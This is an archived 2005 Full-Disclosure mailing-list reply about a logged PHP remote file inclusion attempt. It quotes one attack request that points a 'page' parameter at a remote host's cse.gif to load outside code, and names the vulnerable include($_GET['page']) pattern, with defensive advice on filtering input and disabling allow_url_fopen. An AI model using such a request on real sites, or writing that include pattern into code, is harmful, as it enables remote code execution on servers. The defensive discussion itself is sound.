[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] PHP Command/Safemode Exploit

To: Willem Koenings <infsec@xxxxxxxxx>
Subject: Re: [Full-disclosure] PHP Command/Safemode Exploit
From: Christopher Kunz <christopher.kunz@xxxxxxxxxxxxxxxx>
Date: Fri, 29 Jul 2005 23:02:52 +0200

Willem Koenings wrote:

hi,

looks like CSE exploit is circulating again...
found several queries today from server log
anyone confirms?

"GET /index.php?page=http://213.202.214.198/cse.gif? HTTP/1.1" 404
1035 "-" "Python-urllib/2.4"

Can't see anything new in there. The usual PHP exploit suite, which is very script kiddie compatible, but where do you suspect a new exploit? AFAICT, this is targetted to sites using stuff like

include($_GET['page'])

as their action dispatch inside the script.

If you filter user input correctly, there's absolutely nothing to worry. You might, however, want to check out the Hardening Patch for PHP (http://www.hardened-php.net/, shameless plug) which permits include() for any URL, or disable allow_url_fopen in php.ini.

Regards,

--ck

PS: The site with cse.gif on it is down now.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] PHP Command/Safemode Exploit
  - From: Christopher Kunz
- Re: [Full-disclosure] PHP Command/Safemode Exploit
  - From: Willem Koenings

References:
- [Full-disclosure] PHP Command/Safemode Exploit
  - From: Willem Koenings

Prev by Date: Re: [Full-disclosure] Cisco IOS Shellcode Presentation
Next by Date: Re: [Full-disclosure] Cisco IOS Shellcode Presentation
Previous by thread: [Full-disclosure] PHP Command/Safemode Exploit
Next by thread: Re: [Full-disclosure] PHP Command/Safemode Exploit
Index(es):
- Date
- Thread